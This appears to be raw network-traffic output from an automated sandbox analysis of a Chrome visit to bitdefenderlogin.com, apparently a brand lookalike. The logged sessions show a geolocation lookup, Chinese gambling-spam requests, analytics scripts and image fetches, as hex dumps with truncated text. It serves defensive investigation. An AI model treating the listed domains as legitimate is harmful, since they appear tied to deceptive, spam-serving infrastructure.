                                                                                                                                                          Host: ipinfo.io
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          2024-06-09 22:40:11 UTC513INHTTP/1.1 200 OK
                                                                                                                                                          server: nginx/1.24.0
                                                                                                                                                          date: Sun, 09 Jun 2024 22:40:11 GMT
                                                                                                                                                          content-type: application/json; charset=utf-8
                                                                                                                                                          Content-Length: 314
                                                                                                                                                          access-control-allow-origin: *
                                                                                                                                                          x-frame-options: SAMEORIGIN
                                                                                                                                                          x-xss-protection: 1; mode=block
                                                                                                                                                          x-content-type-options: nosniff
                                                                                                                                                          referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                          x-envoy-upstream-service-time: 3
                                                                                                                                                          via: 1.1 google
                                                                                                                                                          strict-transport-security: max-age=2592000; includeSubDomains
                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                          Connection: close
                                                                                                                                                          2024-06-09 22:40:11 UTC314INData Raw: 7b 0a 20 20 22 69 70 22 3a 20 22 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 31 22 2c 0a 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 31 2e 73 74 61 74 69 63 2e 71 75 61 64 72 61 6e 65 74 2e 63 6f 6d 22 2c 0a 20 20 22 63 69 74 79 22 3a 20 22 44 61 6c 6c 61 73 22 2c 0a 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 54 65 78 61 73 22 2c 0a 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 22 6c 6f 63 22 3a 20 22 33 32 2e 38 31 35 32 2c 2d 39 36 2e 38 37 30 33 22 2c 0a 20 20 22 6f 72 67 22 3a 20 22 41 53 38 31 30 30 20 51 75 61 64 72 61 4e 65 74 20 45 6e 74 65 72 70 72 69 73 65 73 20 4c 4c 43 22 2c 0a 20 20 22 70 6f 73 74 61 6c 22 3a 20 22 37 35 32 34 37 22 2c 0a 20 20 22 74 69 6d 65 7a 6f 6e 65 22 3a 20 22 41 6d 65 72
                                                                                                                                                          Data Ascii: { "ip": "173.254.250.91", "hostname": "173.254.250.91.static.quadranet.com", "city": "Dallas", "region": "Texas", "country": "US", "loc": "32.8152,-96.8703", "org": "AS8100 QuadraNet Enterprises LLC", "postal": "75247", "timezone": "Amer


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1192.168.2.54971523.53.114.19443
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:27 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: identity
                                                                                                                                                          User-Agent: Microsoft BITS/7.8
                                                                                                                                                          Host: fs.microsoft.com
                                                                                                                                                          2024-06-09 22:40:27 UTC466INHTTP/1.1 200 OK
                                                                                                                                                          Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                          ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                          Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                          Server: ECAcc (lpl/EF06)
                                                                                                                                                          X-CID: 11
                                                                                                                                                          X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                          X-Ms-Region: prod-weu-z1
                                                                                                                                                          Cache-Control: public, max-age=62952
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:27 GMT
                                                                                                                                                          Connection: close
                                                                                                                                                          X-CID: 2


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          2192.168.2.549716103.234.73.284434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:28 UTC968OUTGET /nlp/index.php?keyword=%E6%89%93%E9%B1%BC%E6%AD%A3%E8%A7%84%E5%B9%B3%E5%8F%B0%E5%8F%AF%E6%8F%90%E7%8E%B0-%E4%B8%AD%E5%9B%BD%E6%9C%89%E9%99%90%E5%88%86%E5%85%AC%E5%8F%B8&from=pc&originUrl=http%3A%2F%2Fwww.bitdefenderlogin.com%2Fhome.php&referer=&userAgent=Mozilla%2F5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64)%20AppleWebKit%2F537.36%20(KHTML%2C%20like%20Gecko)%20Chrome%2F117.0.0.0%20Safari%2F537.36&v=1530 HTTP/1.1
                                                                                                                                                          Host: www.698jbwad.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Origin: http://www.bitdefenderlogin.com
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Referer: http://www.bitdefenderlogin.com/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:28 UTC443INHTTP/1.1 200 OK
                                                                                                                                                          Server: nginx/1.20.1
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:28 GMT
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          X-Powered-By: PHP/5.6.40
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                          Access-Control-Allow-Headers: Authorization,Content-Type,Accept,Origin,User-Agent,DNT,Cache-Control,X-Mx-ReqToken,X-Requested-With
                                                                                                                                                          Access-Control-Allow-Methods: GET,POST,OPTIONS
                                                                                                                                                          2024-06-09 22:40:28 UTC6208INData Raw: 31 38 33 33 0d 0a ef bb bf ef bb bf ef bb bf 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 23 68 65 61 64 20 69 6d 67 20 7b 70 61 64 64 69 6e 67 3a 31 70 78 3b 6d 61 72 67 69 6e 3a 31 70 78 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 36 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 35 70 78 20 23 63 63 63 63 63 63 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 63 63 63 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 64 69 76 20 69 64 3d 22 68 65 61 64 22 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 3b 22 3e 3c 61 20 68 72 65 66 3d 22 22 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74
                                                                                                                                                          Data Ascii: 1833<style type="text/css">#head img {padding:1px;margin:1px;border-radius: 6px;box-shadow: 0 0 5px #cccccc;border:1px solid #ccc;}</style><div id="head" style="width:1000px;margin:0 auto;"><a href="" rel="nofollow" target="_blank"><img src="ht


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          3192.168.2.54971723.53.114.19443
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:28 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: identity
                                                                                                                                                          If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                          Range: bytes=0-2147483646
                                                                                                                                                          User-Agent: Microsoft BITS/7.8
                                                                                                                                                          Host: fs.microsoft.com
                                                                                                                                                          2024-06-09 22:40:28 UTC514INHTTP/1.1 200 OK
                                                                                                                                                          ApiVersion: Distribute 1.1
                                                                                                                                                          Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                          ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                          Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                          Server: ECAcc (lpl/EF06)
                                                                                                                                                          X-CID: 11
                                                                                                                                                          X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                          X-Ms-Region: prod-weu-z1
                                                                                                                                                          Cache-Control: public, max-age=62974
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:28 GMT
                                                                                                                                                          Content-Length: 55
                                                                                                                                                          Connection: close
                                                                                                                                                          X-CID: 2
                                                                                                                                                          2024-06-09 22:40:28 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                                                                                          Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          4192.168.2.549719163.181.92.2454434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:29 UTC620OUTGET /19924419.js HTTP/1.1
                                                                                                                                                          Host: js.users.51.la
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: http://www.bitdefenderlogin.com/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:30 UTC635INHTTP/1.1 200 OK
                                                                                                                                                          Server: Tengine
                                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:30 GMT
                                                                                                                                                          Access-Control-Allow-Headers: Content-Type
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          Cache-Control: no-store
                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                          Ali-Swift-Global-Savetime: 1717972830
                                                                                                                                                          Via: cache6.l2de2[161,160,200-0,M], cache11.l2de2[161,0], ens-cache11.de5[163,163,200-0,M], ens-cache5.de5[164,0]
                                                                                                                                                          X-Cache: MISS TCP_MISS dirn:-2:-2
                                                                                                                                                          X-Swift-SaveTime: Sun, 09 Jun 2024 22:40:30 GMT
                                                                                                                                                          X-Swift-CacheTime: 0
                                                                                                                                                          Timing-Allow-Origin: *
                                                                                                                                                          EagleId: a3b55c9917179728299565420e
                                                                                                                                                          2024-06-09 22:40:30 UTC4906INData Raw: 31 33 32 32 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 63 6f 6e 66 69 67 20 3d 20 7b 69 74 76 3a 20 31 38 30 30 30 30 30 2c 75 72 6c 31 3a 27 2f 2f 69 61 2e 35 31 2e 6c 61 2f 67 6f 31 3f 69 64 3d 31 39 39 32 34 34 31 39 27 2c 65 6b 63 3a 27 27 7d 3b 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 72 29 7b 69 66 28 6e 5b 72 5d 29 72 65 74 75 72 6e 20 6e 5b 72 5d 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 6f 3d 6e 5b 72 5d 3d 7b 65 78 70 6f 72 74 73 3a 7b 7d 2c 69 64 3a 72 2c 6c 6f 61 64 65 64 3a 21 31 7d 3b 72 65 74 75 72 6e 20 65 5b 72 5d 2e 63 61 6c 6c 28 6f 2e 65 78 70 6f 72 74 73 2c 6f 2c 6f 2e 65 78 70 6f 72 74 73 2c 74 29 2c 6f 2e 6c 6f 61 64 65 64 3d 21 30 2c 6f 2e 65 78 70 6f 72 74 73 7d 76 61 72 20 6e 3d 7b 7d 3b 72
                                                                                                                                                          Data Ascii: 1322(function(){var config = {itv: 1800000,url1:'//ia.51.la/go1?id=19924419',ekc:''};!function(e){function t(r){if(n[r])return n[r].exports;var o=n[r]={exports:{},id:r,loaded:!1};return e[r].call(o.exports,o,o.exports,t),o.loaded=!0,o.exports}var n={};r
                                                                                                                                                          2024-06-09 22:40:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                          Data Ascii: 0


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          5192.168.2.549720163.181.92.2454434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:29 UTC620OUTGET /21771885.js HTTP/1.1
                                                                                                                                                          Host: js.users.51.la
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: http://www.bitdefenderlogin.com/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:30 UTC634INHTTP/1.1 200 OK
                                                                                                                                                          Server: Tengine
                                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:30 GMT
                                                                                                                                                          Access-Control-Allow-Headers: Content-Type
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          Cache-Control: no-store
                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                          Ali-Swift-Global-Savetime: 1717972830
                                                                                                                                                          Via: cache6.l2de2[147,146,200-0,M], cache9.l2de2[148,0], ens-cache1.de5[149,149,200-0,M], ens-cache10.de5[150,0]
                                                                                                                                                          X-Cache: MISS TCP_MISS dirn:-2:-2
                                                                                                                                                          X-Swift-SaveTime: Sun, 09 Jun 2024 22:40:30 GMT
                                                                                                                                                          X-Swift-CacheTime: 0
                                                                                                                                                          Timing-Allow-Origin: *
                                                                                                                                                          EagleId: a3b55c9e17179728299536702e
                                                                                                                                                          2024-06-09 22:40:30 UTC378INData Raw: 31 37 33 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 63 6f 6e 66 69 67 20 3d 20 7b 69 74 76 3a 20 31 38 30 30 30 30 30 2c 75 72 6c 31 3a 27 2f 2f 69 61 2e 35 31 2e 6c 61 2f 67 6f 31 3f 69 64 3d 32 31 37 37 31 38 38 35 27 2c 65 6b 63 3a 27 27 7d 3b 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 72 29 7b 69 66 28 6e 5b 72 5d 29 72 65 74 75 72 6e 20 6e 5b 72 5d 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 6f 3d 6e 5b 72 5d 3d 7b 65 78 70 6f 72 74 73 3a 7b 7d 2c 69 64 3a 72 2c 6c 6f 61 64 65 64 3a 21 31 7d 3b 72 65 74 75 72 6e 20 65 5b 72 5d 2e 63 61 6c 6c 28 6f 2e 65 78 70 6f 72 74 73 2c 6f 2c 6f 2e 65 78 70 6f 72 74 73 2c 74 29 2c 6f 2e 6c 6f 61 64 65 64 3d 21 30 2c 6f 2e 65 78 70 6f 72 74 73 7d 76 61 72 20 6e 3d 7b 7d 3b 72 65
                                                                                                                                                          Data Ascii: 173(function(){var config = {itv: 1800000,url1:'//ia.51.la/go1?id=21771885',ekc:''};!function(e){function t(r){if(n[r])return n[r].exports;var o=n[r]={exports:{},id:r,loaded:!1};return e[r].call(o.exports,o,o.exports,t),o.loaded=!0,o.exports}var n={};re
                                                                                                                                                          2024-06-09 22:40:30 UTC4535INData Raw: 31 31 61 66 0d 0a 22 22 3b 74 72 79 7b 65 3d 75 2e 67 65 74 28 22 5f 5f 74 69 6e 73 5f 5f 22 2b 74 29 7d 63 61 74 63 68 28 74 29 7b 65 3d 21 31 7d 76 61 72 20 6e 3d 65 26 26 69 2e 69 73 4e 28 65 2e 73 69 64 29 26 26 69 2e 69 73 4e 28 65 2e 65 78 70 69 72 65 73 29 26 26 67 2d 65 2e 73 69 64 3c 31 38 65 35 3f 30 3a 31 2c 72 3d 6e 3f 31 3a 65 2e 76 64 2b 31 2c 6f 3d 6e 3f 67 3a 65 2e 73 69 64 2c 63 3d 67 2b 31 38 65 35 3b 72 65 74 75 72 6e 20 75 2e 73 65 74 28 22 5f 5f 74 69 6e 73 5f 5f 22 2b 74 2c 73 2e 73 74 72 69 6e 67 69 66 79 28 7b 73 69 64 3a 6f 2c 76 64 3a 72 2c 65 78 70 69 72 65 73 3a 63 7d 29 2c 6e 75 6c 6c 2c 22 2f 22 29 2c 5b 6e 2c 6e 3f 6f 3a 75 2e 67 65 74 28 22 5f 5f 74 69 6e 73 5f 5f 22 2b 74 29 2e 73 69 64 2c 72 5d 7d 66 75 6e 63 74 69 6f 6e
                                                                                                                                                          Data Ascii: 11af"";try{e=u.get("__tins__"+t)}catch(t){e=!1}var n=e&&i.isN(e.sid)&&i.isN(e.expires)&&g-e.sid<18e5?0:1,r=n?1:e.vd+1,o=n?g:e.sid,c=g+18e5;return u.set("__tins__"+t,s.stringify({sid:o,vd:r,expires:c}),null,"/"),[n,n?o:u.get("__tins__"+t).sid,r]}function
                                                                                                                                                          2024-06-09 22:40:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                          Data Ascii: 0


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          6192.168.2.549723103.85.191.784434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:30 UTC627OUTGET /uploads/8dcea646973bbe2dc76974436b50c144.gif HTTP/1.1
                                                                                                                                                          Host: www.image110.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: http://www.bitdefenderlogin.com/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:30 UTC348INHTTP/1.1 200 OK
                                                                                                                                                          Server: nginx
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:30 GMT
                                                                                                                                                          Content-Type: image/gif
                                                                                                                                                          Content-Length: 162150
                                                                                                                                                          Last-Modified: Fri, 15 Mar 2024 03:24:09 GMT
                                                                                                                                                          Connection: close
                                                                                                                                                          ETag: "65f3bf59-27966"
                                                                                                                                                          Expires: Tue, 09 Jul 2024 22:40:30 GMT
                                                                                                                                                          Cache-Control: max-age=2592000
                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          2024-06-09 22:40:30 UTC16036INData Raw: 47 49 46 38 39 61 e8 03 78 00 f7 ff 00 a5 04 12 d0 6b 30 ff f8 b7 b6 2a 27 ff f8 a9 d0 52 2b f4 52 9a b3 27 0f f8 53 10 ff ec 97 cc 11 04 f7 b2 2b fd ec a8 b1 12 23 d9 aa 70 ff f9 c9 88 00 00 fd 66 06 f8 bb 15 b6 88 4f 77 00 00 67 00 00 d4 4a 12 f7 36 30 fd ec 89 ff ff ff bb 4a 2c fd 47 27 f5 b4 4d b4 95 6c fa d7 76 b0 6b 31 8f 51 29 a5 a7 93 fa ea 78 ff ef 4c d2 99 6b b8 03 02 ff f9 99 f2 25 17 b2 74 47 8f 30 0d ee 8f 2f ea b6 6f f7 2c 48 d3 8e 2b 92 69 4b ad 13 13 f2 0d 75 57 00 00 fc b8 b2 ff eb ca fc da d5 b1 49 11 fe dc a9 ef 73 27 ff fb d9 76 4a 22 d1 74 47 ff d6 99 fc d9 67 f7 ce 66 b3 8a 2d f0 95 47 fe de 84 de ad 53 fc dc 56 b9 13 04 93 6a 30 d7 b7 87 ff e8 bb cc 30 26 f8 c9 35 ff ed 2e d2 6d 0f 73 29 0a dc ca ad fc d8 46 6e 6a 51 de a9 49 f1 b7
                                                                                                                                                          Data Ascii: GIF89axk0*'R+R'S+#pfOwgJ60J,G'Mlvk1Q)xLk%tG0/o,H+iKuWIs'vJ"tGgf-GSVj00&5.ms)FnjQI
                                                                                                                                                          2024-06-09 22:40:30 UTC16384INData Raw: 12 71 70 84 02 02 10 04 25 0c 06 01 4a 38 8c 02 2c 70 83 15 14 c0 0e 72 0b 80 dc 1c e1 08 0d c0 03 32 f5 cc 5b 65 2e 33 19 50 04 c0 0f 7d f3 5b 00 74 40 38 d7 58 c6 70 ab 21 28 e3 18 87 1b dc c8 a6 71 94 9b dc e4 84 13 9c ca 65 ae a2 cb f1 5c 74 92 93 51 d2 85 6e 3a a5 3b 1d 75 50 27 d2 d4 91 d4 75 e4 d9 c5 07 6e c7 9e db 8d a6 06 70 e8 1d 4c 7d 27 d3 e0 e9 c7 3f f7 89 07 7f 8a c7 0f e4 41 c0 1f b9 40 d0 81 12 a4 20 09 41 0f 7a 03 70 d0 01 f0 91 0f 76 80 8c 4a 64 a9 10 9f 86 c0 34 89 30 45 65 2a 82 4a 16 0e 50 be 31 10 22 2d 2c ca 11 8b ec 31 04 05 88 25 7e 76 c0 87 fe d2 ba 3f 26 21 89 ad 48 ff 92 c7 90 02 38 40 03 22 f0 80 56 a2 eb 5d 19 a8 d7 bd 36 50 84 67 ca 51 9c dc 02 c1 09 52 90 4e 6d e2 a0 9f 02 d5 c1 10 02 0a 84 83 e2 60 0a 1f c5 a8 43 b1 b0 b2
                                                                                                                                                          Data Ascii: qp%J8,pr2[e.3P}[t@8Xp!(qe\tQn:;uP'unpL}'?A@ AzpvJd40Ee*JP1"-,1%~v?&!H8@"V]6PgQRNm`C
                                                                                                                                                          2024-06-09 22:40:31 UTC16384INData Raw: 9f 15 6d 22 45 13 1a 05 90 e6 36 82 74 60 5d 55 2b 28 41 3d 30 81 18 4c c0 03 64 eb 01 4f 11 d2 35 7f aa 02 21 0b 41 08 0a b0 46 b6 32 54 e0 12 39 75 57 02 12 20 0d 6f b0 4d 5c 04 c1 68 b9 56 b6 32 17 44 64 22 6b e0 1b 4f 2e 20 d6 0d 88 21 1c 16 11 87 48 44 32 00 6c 58 64 10 1b 19 eb 06 e2 ba 81 5e 6c 85 06 64 55 c9 58 cd 8a 56 cb 69 a2 ad 19 78 ab 46 e2 3a d7 ba 86 35 af 64 dd 6b 06 c4 c1 38 b6 ba 15 ae 82 dd 48 61 0d bb 89 b8 52 b6 ac 67 55 6c 3f aa 02 00 bf 3a 16 b2 72 8d ec 56 4c 37 d8 cf 92 16 b4 a7 35 6d 6a 4b fb d9 c3 42 ce 22 58 40 00 02 1c a1 84 60 04 43 05 95 89 c2 1e 10 71 97 bc 44 ff 60 01 4d 18 01 70 9b a0 82 3d dc 01 30 c6 45 ee 0d 54 80 bc d8 c6 16 79 11 d8 c4 f2 24 d0 83 1f 44 61 01 53 08 86 23 4a 71 01 ee 72 f7 04 d9 bb 43 5d fc 12 01 39
                                                                                                                                                          Data Ascii: m"E6t`]U+(A=0LdO5!AF2T9uW oM\hV2Dd"kO. !HD2lXd^ldUXVixF:5dk8HaRgUl?:rVL75mjKB"X@`CqD`Mp=0ETy$DaS#JqrC]9
                                                                                                                                                          2024-06-09 22:40:31 UTC16384INData Raw: 54 98 0b 3c a5 20 17 7f cd c5 01 72 11 9f 02 ac c1 1d b1 a2 ea 12 ef 04 a0 69 8d 69 8a 64 ea 0f 7f 88 48 d9 62 49 b6 4c 8a 55 e2 62 ff 97 d8 2a 8e 89 1c 9f 8d 13 05 ae 75 2d aa 82 a9 59 0f 4c ed 68 57 0b 5a 32 55 94 1f 59 dc a2 22 8b f2 10 7c 19 00 1b 15 11 24 19 f1 41 c6 79 c5 71 b6 35 a9 2d ba 6e 9b 5b 77 f5 a3 61 fe e2 c8 6f d1 25 dc 73 11 b7 5d 1b e1 08 72 1f b6 dc 4a da 16 b7 6d 6c 49 4b c6 35 90 82 14 0c 64 19 a0 01 4f c6 1b 49 9f 04 c5 92 b4 35 88 cb 66 90 cb 5c 72 41 68 11 88 40 14 6e d0 94 13 c4 8c 67 3f 1b e5 05 a6 b6 07 a2 b1 85 2d 71 09 b0 58 5c e9 34 58 2a e0 6b 5f b3 80 02 6e d0 ff de 5c de 00 2f 8e 18 41 23 e4 d0 84 cc 08 41 0a 52 58 66 24 ce 20 08 0e 3c 01 07 03 69 1b 0e 1e 40 4d 06 34 13 9b 28 3e 5b 0f 16 c0 00 29 90 d3 6f f5 0c 4d e0 62
                                                                                                                                                          Data Ascii: T< riidHbILUb*u-YLhWZ2UY"|$Ayq5-n[wao%s]rJmlIK5dOI5f\rAh@ng?-qX\4X*k_n\/A#ARXf$ <i@M4(>[)oMb
                                                                                                                                                          2024-06-09 22:40:31 UTC16384INData Raw: 9a 14 03 96 aa ac ef 09 f5 1b 95 55 74 a5 82 00 a8 a0 05 ab e4 00 69 c8 29 84 38 3e 61 04 4d a0 cc 30 39 30 cc 60 3e 8d 0b b8 61 0d a4 fe 17 0a 00 0a e7 ad 6f 85 2a 54 89 43 9c e6 e8 4a 99 f3 49 c3 33 a5 a3 89 1a f0 b0 6c a6 e2 e1 d7 ce e0 1c 15 7c 03 9b f4 1a c0 2b 50 a5 81 02 cc 84 15 d2 48 c0 9d f4 d4 03 20 3c c0 94 72 6b ce 0d 19 83 87 1f d0 08 59 02 f1 cf b2 7a 4a 5a b4 80 61 20 06 fa 07 3f 4f 2b 10 23 32 b1 89 8c 13 a8 3f 4b 0b 91 2a ff 56 ce a4 95 7b 50 4a 4c 72 90 cc 71 ee 21 0f 8b c5 c3 6e 87 af 1c e1 56 21 29 30 43 12 de 38 85 46 34 c1 03 2b 48 c1 3f 34 aa 90 01 10 ac 2b 1b 00 e4 1a 90 f7 0f 7f 20 d2 bb 89 9c 69 3c fa b1 8f 7d dc 74 1f 8d 94 1e 6d d7 cb 5e 28 5d f2 bd 05 01 9f 60 32 e6 49 3b c4 c1 be 47 70 84 28 e5 27 c1 5c 81 aa 83 2d 73 d9 03
                                                                                                                                                          Data Ascii: Uti)8>aM090`>ao*TCJI3l|+PH <rkYzJZa ?O+#2?K*V{PJLrq!nV!)0C8F4+H?4+ i<}tm^(]`2I;Gp('\-s
